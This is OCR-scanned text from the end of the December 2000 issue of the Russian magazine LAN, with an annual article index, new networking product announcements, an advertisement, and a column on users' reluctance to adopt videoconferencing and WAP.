жет, а что нет, а также попытаемся найти ей место в сети.
Дуг Аллен Май, стр. 44
Лучшие продукты 2000 года
Среди тысяч продуктов, появившихся в 1999 году, редакция
LAN выбрала 36 наилучших. Июнь. стр. 30
По сетям, по волнам
Рынок беспроводных решений продолжает эволюционировать.
Александр Авдуевский Июль-Август, стр. 30
Беспроводной Internet
Беспроводной Web, в той или иной форме, уже появился. WAP
находится на гребне этой новой волны, но надеяться на ровный
серфинг пока не стоит.
Энди Дорнан Июль-Август, стр. 38
Наведение порядка в политике защиты
Хорошо продуманная и досконально соблюдаемая политика за-
щиты позволяет избежать появления трещин в фундаменте ва-
шей сети.
Дэн Блачарски Сентябрь, стр. 30
Декабрь 2000 103
> ПУТЕВОДИТЕЛЬ ПО СТАТЬЯМ
Укрепление защиты сервера Apache
Apache является наиболее популярным сервером Web в мире. При
тщательной конфигурации его можно сделать и самым защищенным.
Рамон Дж. Онтаньон Сентябрь, стр. 40
Услуги по управлению брандмауэрами
Управление брандмауэрами требует постоянной бдительности.
Если ваша компания не в состоянии держать круглосуточную
охрану, то выходом из ситуации может стать обращение к сто-
ронним услугам.
Дэн Блачарски Сентябрь, стр. 48
Пути унифицированного обмена сообщениями
Сегодня унифицированный обмен сообщениями доступен в
различных вариантах реализации; какой из них будет наиболее
подходящим для вас?
Блэр Плезант Октябрь, стр. 34
Выгоды и опасности электронного обмена сообщениями
С развитием электронного обмена сообщениями изменяются и
угрозы защите. Защитить сообщения можно с помощью следую-
щих процедур.
Рамон Дж. Онтаньон Октябрь, стр. 40
Глобальная пропускная способность: избыток или нехватка?
Какая пропускная способность имеется в действительности, как
много ее необходимо и сколько за нее придется платить?
Тим Строндж и Грахам Финни Ноябрь, стр. 34
Расширенные оптические сервисы:
инициатива за пользователем
11овые решения в области предоставления оптических волн слу-
жат предвестниками появления гибкой транспортной модели с
высокой пропускной способностью с вовлечением конечного
пользователя в процесс предоставления услуг.
Дуг Аллен Ноябрь, стр. 42
А кабели где?
Беспроводные локальные сети с частотой 2,4 ГГц подходят не
всем. Но многие будут удивлены тем, насколько производи-
тельно и дешево современное оборудование.
Джонатан Эйнджел Декабрь, стр. 30
По зубам ли Bluetooth сетевые технологии?
Притязания Bluetooth не ограничиваются только потребитель-
ским рынком. Несмотря на свою потенциальную полезность,
этот радиостандарт с малым радиусом действия может внести
серьезные помехи в работу вашей сети.
Энди Дорнан Декабрь, стр. 40
> УПРАВЛЕНИЕ
Диагностический инструментарий для предприятия
Предотвращение и ликвидация низкоуровневых неисправно-
стей служит основой для нормального функционирования
Internet и глобальных сетей.
Стив Штайнке Январь, стр. 59
Управление сетями для руководителей
Достижения в области сетевого и системного администрирова-
ния должны наконец-то позволить компаниям интегрировать
информационные сети и управление бизнес-процессами.
Энди Дорнан Февраль, стр. 94
Меняющийся лик соглашений об уровне сервиса
При предоставлении гарантий фокус смещается на обеспечение
функционирования приложений, а не отдельных компонентов сети.
Дэн Блачарски Апрель, стр. 103
Управление сетью чужими руками
Управление сетью отнимает слишком много сил и средств?
Быть может, выполнение этой задачи стоит поручить специали-
стам со стороны?
Элизабет Кларк Май, стр. 102
Философия распределения нагрузки
Располагаясь на границе между сетью и серверами, эти слож-
ные устройства играют ключевую роль в производительности
узла Web.
Ленни Либерман Май, стр. 109
> ПОСТСКРИПТУМ
На Марсе будут яблони цвести
Конец века — время разгула предсказателей и футурологов.
Константин Пьннзин Январь, стр. 112
Охота к перемене мест
Сетевой администратор в поисках работы.
Константин Пьянзин Февраль, стр. 112
Искусство составлять резюме
Что следует и чего не следует писать в резюме.
Константин Пьянзин Март, стр. 112
Прием на работу
Как правильно вести себя во время собеседования.
Константин Пьянзин Апрель, стр. 128
Ваш последний шанс
Заключительный этап выбора места работы.
Константин Пьянзин Май, стр. 128
Internet против?
Неужели США и остальной мир разойдутся по поводу конвер-
генции?
Том Нолле Июнь, стр. 128
Linux-проект IPLabs
Интервью с одним из основателей IPLabs Linux Team.
Константин Пьянзин Июль-Август, стр. 128
Игра на повышение
Инвесторы па рынке информационных технологий.
Константин Пьянзин Сентябрь, стр. 112
Есть ли шанс у VDSL?
Перспективы распространения технологии VDSL.
Том Нолле Октябрь, стр. 112
За и против раскрытия сведений о «дырах»
Предупреждение для администраторов или идеи для новых
взломов.
Рик Фэрроу Ноябрь, стр. 128
Человеческий фактор
Восприятие пользователями повой технологии не следует недо-
оценивать.
Ленни Либерман Декабрь, стр. 112
104 LAN/Журнал сетевых решений
> НОВШЕСТВА
Шлюз доступа в Internet для малых и средних компаний №
Superdome масштабируется до 64 процессоров »
ИБП NeuHaus Power System с мощностью 8-120 кВА к»
Шлюз доступа в Internet
для малых и средних компаний
SCOVERY Easygate компании Fujitsu
Siemens Computers представляет со-
бой шлюз на платформе Linux для орга-
низации доступа в Internet, предназна-
ченный для малых и средних предпри-
ятий. Система разрабатывалась с целью
обеспечения простоты инсталляции и об-
служивания, а также создания гибких и
безопасных решений, с помощью которых
малые и средние предприятия могли бы
без проблем подключить к Internet своих
сотрудников и одновременно обеспечить
работу собственной внутренней сети.
В системе SCOVERY Easygate ис-
пользуется многофункциональный тер-
минал SCOVERY xS компании Fujitsu
Siemens Computer с процессором Intel
Celeron с тактовой частотой боо МГц,
жестким диском объемом ю Гбайт и
ОЗУ со стандартным объемом памяти
64 Мбайт. Шлюз поставляется в трех
разновидностях: SCOVERY Easygate
Office для малых компаний с числом со-
трудников не более 50-ти человек;
SCOVERY Easygate Professional для
компаний среднего размера и больших
предприятий с децентрализованной
структурой; SCOVERY.Easygate Global,
в состав которого входит сервер IMAP4
и открытая коммуникационная плат-
форма для обеспечения простого уда-
ленного доступа к электронной почте с
любого сервера, расположенного в ка-
кой угодно точке земного шара.
SCOVERY Easygate Office реализует
все возможности почтовой службы, защи-
ты и управления и имеет встроенный мар-
шрутизатор ISDN, обеспечивающий связь
с Internet на скоростях до 128 Кбит/с.
SCOVERY Easygate Professional поддер-
живает дополнительно сервер Web и тех-
нологию виртуальных частных сетей с ис-
пользованием алгоритма шифрования
Triple DES и IP-туннелирования. SCOV-
ERY Easygate Global обладает расширен-
ной функциональностью благодаря нали-
чию сервера IMAP4 и встроенного комму-
никационного ПО Worldpilot, с помощью
которого пользователь может управлять
адресами и почтой с любого другого ком-
пьютера.
ViPNet позволяет организовать
виртуальную частную сеть
Серия программных продуктов под тор-
говой маркой ViPNet компании «Ин-
фотекс» включает ViPNet CUSTOM,
ViPNet CORPORATE, ViPNet OFFICE,
ViPNet TUNNEL и предназначена для
обеспечения безопасного функциониро-
вания подключенных к Internet компью-
теров и локальных сетей. Данная серия
создана па базе масштабируемого про-
граммного обеспечения «Корпоративная
наложенная сеть ИНФОТЕКС». Послед-
нее сертифицировано Гостехкомиссией
по классу защиты информации 1В для ав-
томатизированных систем и по третьему
классу — для межсетевых экранов.
Продукты ViPNet CORPORATE и
ViPNet CUSTOM предназначены для го-
сударственных учреждений и солидных
компаний и используются для создания
крупных защищенных виртуальных сетей
как внутри локальной сети, так и в
Internet. Оба они имеют развитые средства
управления и администрирования, а раз-
личаются только тем, что первый из них
является «коробочным» вариантом ПО, а
второй может быть сконфигурирован в со-
ответствии с требованиями заказчика.
Еще один «коробочный» продукт —
ViPNet OFFICE - предназначен для
среднего и малого бизнеса. ViPNet
OFFICE позволяет быстро создать вир-
туальную частную сеть, обеспечив таким
образом защищенное взаимодействие от-
дельных компьютеров в локальной сети и
Internet, а также организовать удаленный
доступ в корпоративную сеть из домаш-
них офисов или с ноутбуков. Если же
компании необходимо связать через
Internet две локальные сети целиком, то
это можно сделать с помощью защищен-
ного IP-туннеля - ViPNet TUNNEL.
Кроме построения виртуальных защи-
щенных сетей продукты серии ViPNet
предоставляют целый комплекс собст-
Fujitsu Siemens Computers
SCOVERY Easygate
«Инфотекс» ViPNet
> http://www.lanmag.ru
Декабрь 2000 107
> НОВШЕСТВА
Molex Voice Cabling System
HP 9000 Superdome
венных защищенных приложений. Это
служба оповещения о подключении або-
нентов к сети VPN и отключении от нее;
обмен информацией и проведение кон-
ференций с подтверждением доставки и
прочтения сообщений; электронная поч-
та (достоверность полученных по ней со-
общений гарантируется электронной
подписью писем и вложенных файлов); а
также установление речевой и видеосвя-
зи через Internet. При этом в случае нару-
шения связи в процессе пересылки боль-
ших файлов, передача информации мо-
жет быть возобновлена начиная с зафик-
сированного момента разрыва.
Кабельная система
для поддержки передачи речи
oice Cabling System (VCS) компании
Molex представляет собой решение
для обеспечения передачи речи. Основу
системы составляют разъединяемые
(disconnect) и соединительные (connec-
tion) модули, монтируемые на специаль-
ную раму или в специальную настенную
коробку (5 или ю модулей). Обе разно-
видности модулей оснащены контактами
типа IDC для упрощения терминирова-
ния кабелей. Контакты разъединяемых
модулей крепятся таким образом, что их
можно разъединить с помощью специ-
альной вилки. Эта вилка служит для от-
ключения входящей телефонной линии.
Соединение обеих частей модулей осу-
ществляется с помощью соединитель-
ных модулей с фабричным подключени-
ем контактов. Заземляющие модули
обеспечивают подключение экрана вхо-
дящего кабеля к земле.
Использование разъединяемых моду-
лей с Gas Arrestor Magazine позволяет за-
щитить систему от избыточных напряже-
ний. При избыточном напряжении ущерб
может бы ть нанесен только предохраните-
лю, сама же система передачи речи не по-
страдает. Специально предусмотренные
контакты с обеих сторон магазина обеспе-
чивают подключение внутренней панели
к задней стороне монтажной рамы.
В качестве дополнительного оборудо-
вания предлагаются различные маркиру-
ющие элементы. Label Holder for Back
Mount Frame с бумажной маркировочной
полосой предназначен для идентифика-
ции всех соединительных секций. Инди-
видуальные модули могут быть маркиро-
ваны с помощью Labe] Holder for Modules
или Numbering Kit.
Специально разработанный инстру-
мент позволяет терминировать провода
на модулях VCS, затрачивая при этом
минимум усилий. Излишек обрезается
автоматически с помощью встроенных
ножниц. Кроме того, этот инструмент да-
ст возможность изымать предохранители
из магазина и удалять модули из рамы.
Если свободное пространство ограни-
чено, рама Back Mount Frame позволяет
устанавливать систему непосредственно
на стену. Рам:а рассчитана на 5 или п мо-
дулей (50 или юо пар). Dust Cover защи-
щает соединения от пыли и других за-
грязнений. Распределительные короба
обеспечивают безопасность установки
модулей VCS.
Superdome масштабируется
до 64 процессоров
Новый UNIX-сервер HP 9000
Superdome компании Hewlett-
Packard предназначен для обеспечения
непрерывной работы систем электронно-
го бизнеса. Он адресован крупным
Internet-компаниям, поставщикам услуг
и другим предприятиям, где приходится
обрабатывать многочисленные запросы и
работать с большими объемами данных.
Система HP Superdome имеет три
различные конфигурации. Самая мощ-
ная модель вмещает до 64 процессоров,
снабжена оперативной памятью емко-
стью до 256 Гбайт и 192 PCI-платами вво-
да/вывода. В настоящее время серверы
оснащаются процессорами РА-8600/552
МГц, в будущем в них планируется уста-
навливать также процессоры РА-8700 и
IA-64. Кроме того, общее число поддер-
живаемых процессоров планируется до-
вести до 128.
Производительность нового гиганта в
два раза выше, чем у моделей класса V.
Новый сервер работает под управлением
специально оптимизированной ОС HP
UXni. В ОС HP UXni реализован це-
лый набор новых возможностей, в числе
которых поддержка виртуальных разде-
лов и замена узлов сервера без отключе-
ния питания. Модели на базе процессора
IA-64 будут поддерживать сразу три опе-
рационные системы: HP UXni, Windows
и 64-разрядный вариант Linux.
Superdome имеет секционную архите-
ктуру. Основная секция — 4-х процессор-
ная ячейка. Восемь таких секций могут
быть объединены высокоскоростными
коммутаторами в единый 32-х процессор-
108 LAN/Журнал сетевых решений
> НОВШЕСТВА
ный блок. С помощью высокоскоростной
системы два таких блока становятся 64-х
процессорным суперкомпьютером. Для
выполнения наиболее сложных научных
и технических расчетов, несколько серве-
ров Superdome можно объединить в одну
мощную группу, используя технологию
Hyperplex.
ИБП NeuHaus Power System
с мощностью 8-120 кВА
ИБП серии Power System компании
Neu Haus Group имеют широкий диа-
пазон мощностей от 8—120 кВЛ. В этих
источниках бесперебойного питания ре-
ализованы все последние наработки, та-
кие, как, например, инвертор с широт-
но-импульсной модуляцией на IGBT-
транзисторах и микропроцессорное уп-
равление (с использованием двух мик-
ропроцессоров компании Intel). В се-
рию входят модели 8—20 кВА с одно-
фазным и модели ю -120 кВА с трехфаз-
ным выходом.
Отличительными особенностями но-
вых систем NeuHaus Group являются
способность выдерживать сверхвысокие
перегрузки, наличие защиты от обратно-
го тока в обходной цепи (By pass), воз-
можность параллельного подключения
до шести одноранговых модулей для ре-
зервирования или масштабирования сис-
темы и встроенный режим экономии
энергопотребления.
Серия Power System обладает высокой
надежностью (среднее время наработки
на отказ составляет около 17 лет) при
низкой цене и высокой мобильности (си-
стема 8о кВА веси т всего 555 кг, тогда как
аналоги - до 1,5 т). Специально для дан-
ной серии разработано новое современ-
ное программное обеспечение Power
Shield.
Цена, в зависимости от модели, варьи-
руется в пределах от ю до 26 тыс. долла-
ров; в эту сумму входят предпроектная
экспертиза, разработка проекта специали-
стами компании NeuHaus Group, стои-
мость самого оборудования, инсталляция
и гарантийное обслуживание в течение
двух лет.
USB-адаптер для подключения
компьютер тв к сетям Fast Ethernet
MT-USB100 компании Allied Telesyn
International представляет собой
сетевой адаптер с интерфейсом USB
для подключения компьютеров к сетям
Ethernet и Fast Ethernet. Для организа-
ции соединения с локальной сетью
пользователю достаточно просто под-
соединить интерфейсный кабель к
разъему USB.
Адаптер AT-USBioo совместим со
стандартами IEEE 802.3 и USB 1.1. Опе-
рационные системы Windows 98 и
Windows 2000 уже содержат предуста-
новленные драйверы USB, поэтому ус-
тановка и настройка адаптера происхо-
дит практически в автоматическом ре-
жиме в соответствии с принципом plug-
and-play.
Адаптер AT-USBioo оснащен стан-
дартным разъемом RJ-45 для подклю-
чения к сети Ethernet на основе экра-
нированной или неэкранированной ви-
той пары. Для работы адаптера его под-
ключение к сети электропитания не
требуется, так как питание подается
через разъем USB. Полное соответст-
вие стандарту FCC Class В гарантирует
отсутствие помех, возникающих при
работе электробытовых приборов и
офисной техники. Для отключения
адаптера от сети нет необходимости в
выключении ПК.
NeuHaus Power System
Шлюз Intel в VPN поддерживает
10 000 туннелей
Два VPN-шлюза NctStructure 3130 и
NetStructure 3125 компании Intel поз-
воляют предоставить предприятиям за-
щищенные соединения удаленным поль-
зователям, филиалам и партнерам по
бизнесу, а также сократить затраты на
выделенные линии и оплату телефонных
счетов. Обе модели обеспечивают пропу-
скную способность до 95 Мбит/с и под-
держивают до ю ооо туннелей VPN од-
новременно. Шасси 3130 высотой 4U со-
держит дополнительные слоты PCI, а
3125 предлагает сравнимую производи-
тельность при высоте 1U.
Полностью IPSec 1.1-совместимый про-
дукт поддерживает неограниченное число
клиетов и включает персональный бранд-
мауэр BlackICE Defender от NetworkICE.
NetStructure VPN Management Suite име-
ет инструментарий составления отчетов
для аудита защиты и анализа использова-
ния VPN, а также средство для централи-
зованного управления на базе Web и раз-
вертывания клиентского программного
обеспечения VPN.
NetStructure 3130 и 3125 стоят каждый
21 тыс. долларов.
> http://www.lanmag.ru
Декабрь 2000 109
> ПОСТСКРИПТУМ
(начало на странице 112)
которые в 90-е гг. усиленно превозноси-
ли конвергенцию. Они прекрасно объяс-
няют, почему все должны брать на воору-
жение данную технологию, но, к сожале-
нию, не могут столь же блестяще растол-
ковать, почему никто ничего не покупает.
Я хотел бы дать специалистам, рабо-
тающим с сетями, два совета. Во-пер-
вых, нельзя недооценивать значение
«болевого порога», который удерживает
пользователей от перехода на новую
технологию. Всем известно, что пользо-
ватели с большой долей вероятности не
захотят остаться на узле Web, содержи-
мое которого загружается на полсекун-
ды дольше обычного, так почему они
должны спокойно выносить пятисе-
кундную процедуру навигации по узлу с
помощью кнопок мобильного телефо-
на? Большинство из этих людей не уме-
ют даже программировать свои видео-
магнитофоны. Им удается управляться
со средствами Web на своих компьюте-
рах в первую очередь потому, что дан-
ные средства активно используют гра-
фику и интуитивно понятны. Сомнева-
юсь, что эти пользователи сколь-нибудь
благосклонно отнесутся к тем видам ин-
терфейса, которые WAP сможет пред-
ложить им в ближайшем будущем.
Во-вторых, нельзя недооценивать
расходы па консультативную поддержку'
новой технологии. Допустим, вы собира-
етесь обеспечить своим пользователям
или сторонним клиентам телефонный
доступ к ряду полезных служб через
Web. Поскольку это для них новое сред-
ство, у них, возможно, будут возникать
вопросы но поводу его использования.
Учтите, что, когда такой пользователь
сталкивается с некой проблемой, он дер-
жит в руке телефон, поэтому, что он, по-
вашему, предпримет? Правильно, позво-
нит в службу поддержки. И он будет рас-
считывать на ускоренный доступ — пу-
тем нажатая одной кнопки. Готовы ли
вы к такой лавине звонков? Заложена ли
она в ваш бюджет по реализации WAP?
Боюсь, что нет. Кто-то, по-видимому,
забыл, что Web — это среда самообслу-
живания, тогда как телефон — инстру-
мент взаимодействия между' людьми.
Вспомните, ведь для многих невыноси-
мо даже простое перемещение по меню
голосовой почты при выполнении звон-
ка. Л все потому, что у людей есть опре-
деленные привычки, предпочтения,
эмоции, наконец. Все это никак нельзя
оставлять без внимания.
Я вовсе не утверждаю, что протокол
WAP и телефоны с поддержкой WAP
не способны предложить ничего инте-
ресного в плане бизнеса. Я всего лишь
возражаю против механического «пере-
саживания» методов доступа в Internet
со стационарных компьютеров на «поч-
ву» беспроводной технологии Web.
Кое-кто из нас хотел бы иметь повод не
отвечать па электронную почту хотя бы
до обеда. LAN
Ленни Либерман — консультант по воп-
росам применения сетевых технологий в
сфере бизнеса и автор статей по этой
теме. С ним можно связаться по адресу:
LL@exitiQg.com.
Голден Лайн
ЯШАЛЫ СВЯЗИ ДЛЯ ЛЮБЫХ ЦЕЛЕЙ
- Наши услуги доступны В Любой точке Москвы;
- Предоставим услугу быстрее всех;
- Надежность за разумную Цену;
- Предоставим Каналы СВЯЗИ Любого ТИПЭ;
- Всегда готовы ПрИЙТИ НЭ ПОМОЩЬ КЛИвНТу.
Подключаем:
Ко всем провайдерам INTERNET
операторам дальней связи
Это мы умеем
______лучше всех!
-л ТО1Л п ПО nirtEklY I 1ГПЕ1Л I
Россия, 129110, Москва, ул. Щепкина, 51/4
тел.: (095) 916 5000
финансово-торговым
информационным
факс: (095) 2811971,
e-mail: admi®gl.ru,
http://www.gl.ru
транспортным
туристическим
глобальным компьютерным
системам.
> http://www.lanmag.ru
Декабрь 2000 111
> ПОСТСКРИПТУМ
Восприятие пользователями
новой технологии
не следует недооценивать.
Человеческий фактор
Ленни Либерман
Когда в 1999 г. у меня появился ка-
бельный модем, я решил заодно
купить микрофон и настольную
видеокамеру. Дело в том, что я работаю
дома и большую часть дня провожу в
беседах со специалистами по высоким
технологиям. Поскольку я стараюсь
как можно реже совершать деловые по-
ездки, то мне показалось благоразум-
ным воспользоваться программой
NetMeeting для проведения настоль-
ных видеоконференций.
Увы, я ошибался. Ни одного из моих
предполагаемых собеседников ничуть не
привлекла идея визуального общения
через Internet. Единственными людьми,
проявившими хоть какой-то интерес к
применению NetMeeting в качестве
средства связи, были мои друзья, кото-
рым хотелось проверить, как у них рабо-
тают видеокамеры, а также несколько
незнакомцев, которые хотели знать, как
я выгляжу в голом виде (каюсь, я не удо-
влетворил их любопытства).
Итак, никто из моих коллег не изъя-
вил ни малейшего желания садиться за
компьютер лишь для того, чтобы наблю-
дать, как я двигаю челюстями во
время разговора. Хотя статистика
и свидетельствует о том, что весьма
существенная часть информации,
сообщаемой в ходе беседы, посту-
пает визуально, моим знакомым
это не требовалось. Те из пас, кому
много приходится «висеть» на те-
лефоне, достигли виртуозности в
умении говорить и слушать, — по-
добно тому, как у незрячих людей
их физический недостаток ком-
пенсируется развитием других
видов чувств.
На самом деле люди, с которы-
ми я разговариваю, часто бывают
даже рады, что я не могу их ви-
деть. Они вольны, зажав трубку
рукой, спокойно перешептывать-
ся с соседями, пока я излагаю
свои мысли, или удивленно под-
нимать брови, если я говорю что-
то особенно глупое.
© Miller Freeman Inc.
Я решил поднять эту тему потому,
что сейчас много говорится о технологи-
ях — в том числе о видеоконференц-свя-
зи, — которые вызывают энтузиазм у
технических специалистов, но могут
оказаться не воспринятыми обычными
пользователями, чье повеление обусло-
влено элементарными особенностями
человеческой природы, а не их ролью
как субъектов электронной экономики.
В этой связи мне представляется
весьма уместным обсудить соотноше-
ние между персонализацией и конфи-
денциальностью. Продавцы стремятся
любыми путями «вцепиться» в покупа-
теля, используя инструменты интеллек-
туального анализа данных и динамиче-
скую версию HTML. Однако многие
люди не хотят, чтобы их вообще кто-ли-
бо тревожил. Поэтому, прежде чем вкла-
дывать средства в разработку таких ре-
шений, вы должны получить как можно
более четкое представление о вкусах и
предпочтениях своих клиентов. Оку-
пятая ли ваши инвестиции, если 20%
клиентов не примет новую технологию?
А если таковых будет 6о% или 8о%?
Пусть их окажется всего лишь 30%, но
что если в это число попадут ваши са-
мые выгодные клиенты?
... И WAP-ИЗАЦИЯ всей страны
Аналогичные споры вызывает еще одна
технология — беспроводной доступ в
Web, или, как это сейчас принято назы-
вать, «мобильная коммерция» (ш-сот-
тсгсе). Она опирается па предположе-
ние, что пользователи, постоянно рабо-
тающие с информационным наполнени-
ем Web, и Internet-покупатели не смо-
гут ни секунды прожить без связи с Се-
тью, если им придется отлучиться от
своих ПК. И каков же выход? Им пред-
лагаются несколько модифицирован-
ные возможности доступа в Web с циф-
ровых мобильных телефонов, позволя-
ющие им получать электронную почту,
следить за курсом акций и заказывать
пиццу — в любое время и в любом месте.
Растущий ажиотаж вокруг беспро-
водного доступа в Web объясняется тех-
политическим прогрессом. Изготовите-
ли микросхем способны заложить боль-
ше функций, необходимых для работы
беспроводных служб Internet, в
более компактные и дешевые про-
цессоры, так что «интеллектуаль-
ные» телефоны кажутся вполне
естественной точкой приложения
новой технологии. Согласно про-
гнозам аналитиков, все телефон-
ные аппараты, которые будут вы-
пущены до конца 2000 г., будут
поддерживать протокол WAP
(Wireless Application Protocol),
который становится непремен-
ным атрибутом любых средств
беспроводного доступа в Web.
Проблема лишь в том, что ни-
кто не удосужился выяснить, хо-
тят ли люди на самом деле исполь-
зовать свои телефоны как компью-
теры. В конце концов, они ведь не
проявили особого интереса к ис-
пользованию компьютеров в каче-
стве телефонов. Сторонники WAP
очень напоминают мне агитаторов,
(продолжение на странице ш )
112 LAN/Журнал сетевых решений